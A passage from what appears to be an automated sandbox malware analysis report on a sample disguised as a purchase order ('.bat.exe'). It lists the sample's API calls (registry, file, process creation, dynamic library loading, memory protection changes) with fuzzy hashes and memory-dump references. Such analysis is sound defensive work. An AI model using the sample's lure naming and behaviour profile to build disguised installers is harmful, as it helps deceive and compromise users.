                                                                      • Opcode Fuzzy Hash: 44422ec4cc38e602ea7d4d2f5f5b5ed5cf3abc39ac7d2c30bec0a520d1a14902
                                                                      • Instruction Fuzzy Hash: 0F01F4327212209BE7295B389D05B6B3698E710354F10863FF855F6AF1DA78CC429B4C
                                                                      APIs
                                                                      • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040245B
                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 00402464
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3093436983.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3093406445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093460679.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093619612.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093619612.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Purchase Order No.jbxd
                                                                      Similarity
                                                                      • API ID: CloseDeleteValue
                                                                      • String ID:
                                                                      • API String ID: 2831762973-0
                                                                      • Opcode ID: bb53019bc6b0262c1a7ba30a0e76d60d513ae05c0bd0953298f21ea634c4095c
                                                                      • Instruction ID: 5f3bbf62c25f8db8e4007b741f5cecc6338069a28fa7be666feaa9c5da8c1564
                                                                      • Opcode Fuzzy Hash: bb53019bc6b0262c1a7ba30a0e76d60d513ae05c0bd0953298f21ea634c4095c
                                                                      • Instruction Fuzzy Hash: FCF06232A04520ABDB10BBA89A8DAEE62A5AF54314F11443FE542B71C1CAFC4D02976D
                                                                      APIs
                                                                      • CreateDirectoryW.KERNELBASE(0042C800,?), ref: 00405C18
                                                                      • GetLastError.KERNEL32 ref: 00405C26
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3093436983.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3093406445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093460679.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093619612.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093619612.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Purchase Order No.jbxd
                                                                      Similarity
                                                                      • API ID: CreateDirectoryErrorLast
                                                                      • String ID:
                                                                      • API String ID: 1375471231-0
                                                                      • Opcode ID: cc352e270a5c7d66bac2c8a7d463e84c1d5eb2dce2c10117675193e318c6cc25
                                                                      • Instruction ID: c951f985784cdd1ce4bfd292213bf749a6eab04c72170860fc3503b4537cd402
                                                                      • Opcode Fuzzy Hash: cc352e270a5c7d66bac2c8a7d463e84c1d5eb2dce2c10117675193e318c6cc25
                                                                      • Instruction Fuzzy Hash: 67F0F4B0C04209DAEB00CFA4D9487EFBBB4FB04309F00842AD541B6281DBB882488BA9
                                                                      APIs
                                                                      • CreateProcessW.KERNELBASE(00000000,0042C800,00000000,00000000,00000000,04000000,00000000,00000000,00425F50,?,?,?,0042C800,?), ref: 00405C8E
                                                                      • CloseHandle.KERNEL32(?,?,?,0042C800,?), ref: 00405C9B
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3093436983.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3093406445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093460679.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093619612.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093619612.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Purchase Order No.jbxd
                                                                      Similarity
                                                                      • API ID: CloseCreateHandleProcess
                                                                      • String ID:
                                                                      • API String ID: 3712363035-0
                                                                      • Opcode ID: dc4e0aa2a6e4d88c421582106c1d46ba955b2ae98b0244f92ff0ec2e2b298c3d
                                                                      • Instruction ID: 40cf053be3b9956ee682ea3cdb0c0f8171e7446c395677da6238e6dd92eb787c
                                                                      • Opcode Fuzzy Hash: dc4e0aa2a6e4d88c421582106c1d46ba955b2ae98b0244f92ff0ec2e2b298c3d
                                                                      • Instruction Fuzzy Hash: A4E0BFB4600219BFFB109B64EE49F7B7B7CEB00648F418425BD14F2551D77498149A7C
                                                                      APIs
                                                                      • GetModuleHandleA.KERNEL32(?,00000020,?,00403755,0000000C,?,?,?,?,?,?,?,?), ref: 00406A88
                                                                      • GetProcAddress.KERNEL32(00000000,?), ref: 00406AA3
                                                                        • Part of subcall function 00406A06: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406A1D
                                                                        • Part of subcall function 00406A06: wsprintfW.USER32 ref: 00406A58
                                                                        • Part of subcall function 00406A06: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406A6C
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3093436983.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3093406445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093460679.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093619612.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093619612.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Purchase Order No.jbxd
                                                                      Similarity
                                                                      • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                      • String ID:
                                                                      • API String ID: 2547128583-0
                                                                      • Opcode ID: ecfc0d1632056c4e1693efd0f98aabdfe4a2c93a6abc515f3d9591ad468ff55d
                                                                      • Instruction ID: b294046d3e4dddd9dd595f306a5883e4a37f4b9faaa0bea25d2c73fe5553ab8f
                                                                      • Opcode Fuzzy Hash: ecfc0d1632056c4e1693efd0f98aabdfe4a2c93a6abc515f3d9591ad468ff55d
                                                                      • Instruction Fuzzy Hash: DFE08636704610AAD610BA709E48C6773A89F86710302C83FF546F6140D738DC32AA79
                                                                      APIs
                                                                      • GetFileAttributesW.KERNELBASE(00000003,00403118,C:\Users\user\Desktop\Purchase Order No.5817-0001142025.bat.exe,80000000,00000003), ref: 00406176
                                                                      • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00406198
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3093436983.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3093406445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093460679.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093619612.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093619612.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Purchase Order No.jbxd
                                                                      Similarity
                                                                      • API ID: File$AttributesCreate
                                                                      • String ID:
                                                                      • API String ID: 415043291-0
                                                                      • Opcode ID: d28f21770be58fa8ab322e44db2ef64be76ab1399ecbb41bfd548adfe90c5e60
                                                                      • Instruction ID: be52236ca1bfc2e7009fe271a1dfd41440a2a0d1ebc26b2cb4c8630358080456
                                                                      • Opcode Fuzzy Hash: d28f21770be58fa8ab322e44db2ef64be76ab1399ecbb41bfd548adfe90c5e60
                                                                      • Instruction Fuzzy Hash: 30D09E31254301EFFF098F20DE16F2EBAA2EB94B00F11952CB682941E0DA715819DB15
                                                                      APIs
                                                                      • CreateDirectoryW.KERNELBASE(?,00000000,00403638,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040392F,?,00000008,0000000A,0000000C), ref: 00405C36
                                                                      • GetLastError.KERNEL32(?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00405C44
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3093436983.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3093406445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093460679.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093619612.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093619612.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Purchase Order No.jbxd
                                                                      Similarity
                                                                      • API ID: CreateDirectoryErrorLast
                                                                      • String ID:
                                                                      • API String ID: 1375471231-0
                                                                      • Opcode ID: 713f00ffaa2578e3ba1d99e04a2fab42aad7341dbc9e3b83e2e07bf738d273a4
                                                                      • Instruction ID: 9ee767d7bb24d12ef4013e29ffdbd8bf560f6e5ed3fd997729cc5c4a92c9c995
                                                                      • Opcode Fuzzy Hash: 713f00ffaa2578e3ba1d99e04a2fab42aad7341dbc9e3b83e2e07bf738d273a4
                                                                      • Instruction Fuzzy Hash: 4EC08C30208601DAEA040B30DE08F073A50BB00340F214439A082E40A4CA308004CD2D
                                                                      APIs
                                                                      • SetFilePointer.KERNELBASE(00000000,?,00000000,?,?), ref: 004028B4
                                                                        • Part of subcall function 004065C9: wsprintfW.USER32 ref: 004065D6
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3093436983.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3093406445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093460679.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093619612.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093619612.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Purchase Order No.jbxd
                                                                      Similarity
                                                                      • API ID: FilePointerwsprintf
                                                                      • String ID:
                                                                      • API String ID: 327478801-0
                                                                      • Opcode ID: be6f6e28811eff9f61e37437ffce11e37693180493ed76b7cb4b0af79cd2cf68
                                                                      • Instruction ID: a9a910f18d9475f192186a99a32baa3f0737176f8f71227260f04108cb8f5765
                                                                      • Opcode Fuzzy Hash: be6f6e28811eff9f61e37437ffce11e37693180493ed76b7cb4b0af79cd2cf68
                                                                      • Instruction Fuzzy Hash: CEE06D71A04108BFDB01ABA5BE499AEB3B9EB44354B20483FF102B00C8CA784D119A2D
                                                                      APIs
                                                                      • WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 004023EE
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3093436983.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3093406445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093460679.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093619612.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093619612.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Purchase Order No.jbxd
                                                                      Similarity
                                                                      • API ID: PrivateProfileStringWrite
                                                                      • String ID:
                                                                      • API String ID: 390214022-0
                                                                      • Opcode ID: cc309e7f02997b5e016163de44fe3fdddd8bf4d3fe64c06df27e2bc62d43203d
                                                                      • Instruction ID: 95154b02373db31601182c66ccc42c3a1d246cd64da090b0d32e859a1de181fa
                                                                      • Opcode Fuzzy Hash: cc309e7f02997b5e016163de44fe3fdddd8bf4d3fe64c06df27e2bc62d43203d
                                                                      • Instruction Fuzzy Hash: 7DE04F31900524BADB5036B15ECDDBE20685FC8318B14063FFA12B61C2D9FC0C43466D
                                                                      APIs
                                                                      • RegCreateKeyExW.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402E5C,00000000,?,?), ref: 00406546
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3093436983.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3093406445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093460679.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093619612.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093619612.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Purchase Order No.jbxd
                                                                      Similarity
                                                                      • API ID: Create
                                                                      • String ID:
                                                                      • API String ID: 2289755597-0
                                                                      • Opcode ID: b17b4e85cc10dff7c00d1995fa2300a068af545831f113dbcef6cd8b4d780b07
                                                                      • Instruction ID: eb898ae1b777051f051c4ab58df26dcf4e878c8f9f4a5c47b005eb973d4bb03b
                                                                      • Opcode Fuzzy Hash: b17b4e85cc10dff7c00d1995fa2300a068af545831f113dbcef6cd8b4d780b07
                                                                      • Instruction Fuzzy Hash: 75E0E6B2010109BEEF095F50EC0AD7F371DE708710F11452EF906D4051E6B5E9309A39
                                                                      APIs
                                                                      • WriteFile.KERNELBASE(00008001,00000000,00000000,00000000,00000000,0040FE78,0040CEF0,0040357E,0040CEF0,0040FE78,00414EF0,00004000,?,00000000,004033A8,00000004), ref: 00406238
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3093436983.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3093406445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093460679.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093619612.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093619612.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Purchase Order No.jbxd
                                                                      Similarity
                                                                      • API ID: FileWrite
                                                                      • String ID:
                                                                      • API String ID: 3934441357-0
                                                                      • Opcode ID: 4494c28c6fc58b77f7b94402ffbb10e79d92760fb9961e7d9dbcb201027e3d13
                                                                      • Instruction ID: 6296e445ee025582091cb162a3efd7a4c9b40fecddc6e186669f82422f4bfe72
                                                                      • Opcode Fuzzy Hash: 4494c28c6fc58b77f7b94402ffbb10e79d92760fb9961e7d9dbcb201027e3d13
                                                                      • Instruction Fuzzy Hash: 00E08C3221021AABDF10AE548C00EEB3B6CEB013A0F02447AFD16E3050D231E83097A9
                                                                      APIs
                                                                      • ReadFile.KERNELBASE(00008001,00000000,00000000,00000000,00000000,00414EF0,0040CEF0,004035FA,00008001,00008001,004034FE,00414EF0,00004000,?,00000000,004033A8), ref: 00406209
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3093436983.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3093406445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093460679.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093619612.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093619612.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Purchase Order No.jbxd
                                                                      Similarity
                                                                      • API ID: FileRead
                                                                      • String ID:
                                                                      • API String ID: 2738559852-0
                                                                      • Opcode ID: 076a4193e787d8b2f8fcded04b516b0b1a94860d7d4352c54bed072072f3bbd3
                                                                      • Instruction ID: f029eba0d3a9f8ebddca737992f63761e7b4746d0aa70cfc26448402395c61e3
                                                                      • Opcode Fuzzy Hash: 076a4193e787d8b2f8fcded04b516b0b1a94860d7d4352c54bed072072f3bbd3
                                                                      • Instruction Fuzzy Hash: 5DE08632154119EBCF106E908C00EEB379CEF15350F014876F921E7440D230E8328FA4
                                                                      APIs
                                                                      • VirtualProtect.KERNELBASE(6FBB505C,00000004,00000040,6FBB504C), ref: 6FBB2A9D
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3149615985.000000006FBB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 6FBB0000, based on PE: true
                                                                      • Associated: 00000000.00000002.3149545939.000000006FBB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3149634287.000000006FBB4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3149686738.000000006FBB6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_6fbb0000_Purchase Order No.jbxd
                                                                      Similarity
                                                                      • API ID: ProtectVirtual
                                                                      • String ID:
                                                                      • API String ID: 544645111-0
                                                                      • Opcode ID: dc38c65302c91c3d030c7a0256ec1413bfe85128ffeab1bc9ee46e011385aa29
                                                                      • Instruction ID: 0799a86aa448d3bdb1fa22d0801aba7f93957829b5d8f5e8dbc3510a759700b5
                                                                      • Opcode Fuzzy Hash: dc38c65302c91c3d030c7a0256ec1413bfe85128ffeab1bc9ee46e011385aa29
                                                                      • Instruction Fuzzy Hash: 2EF0A5B0508A80DECB91CF2EE4847093BF0BB1A324BD4452EE148D7248EB745066CB9B
                                                                      APIs
                                                                      • GetPrivateProfileStringW.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 0040242A
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3093436983.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3093406445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093460679.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093619612.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093619612.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Purchase Order No.jbxd
                                                                      Similarity
                                                                      • API ID: PrivateProfileString
                                                                      • String ID:
                                                                      • API String ID: 1096422788-0
                                                                      • Opcode ID: 979b3f2ec0bc23d324c76cc3db4c1f8da93b0e1d0eaca7bbe8bd823efade59bd
                                                                      • Instruction ID: 816608b18dc0c520cd9a71caba4f9b5dbdb35d60be0fcf423de44464aa3a4457
                                                                      • Opcode Fuzzy Hash: 979b3f2ec0bc23d324c76cc3db4c1f8da93b0e1d0eaca7bbe8bd823efade59bd
                                                                      • Instruction Fuzzy Hash: 95E04F31800229BEDB00EFA0CD09DAD3678AF40304F00093EF510BB0D1E7FC49519749
                                                                      APIs
                                                                      • RegOpenKeyExW.KERNELBASE(00000000,00421F28,00000000,00000000,?,?,00000000,?,0040657D,?,00421F28,?,?,Call,?,00000000), ref: 00406513
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3093436983.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3093406445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093460679.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
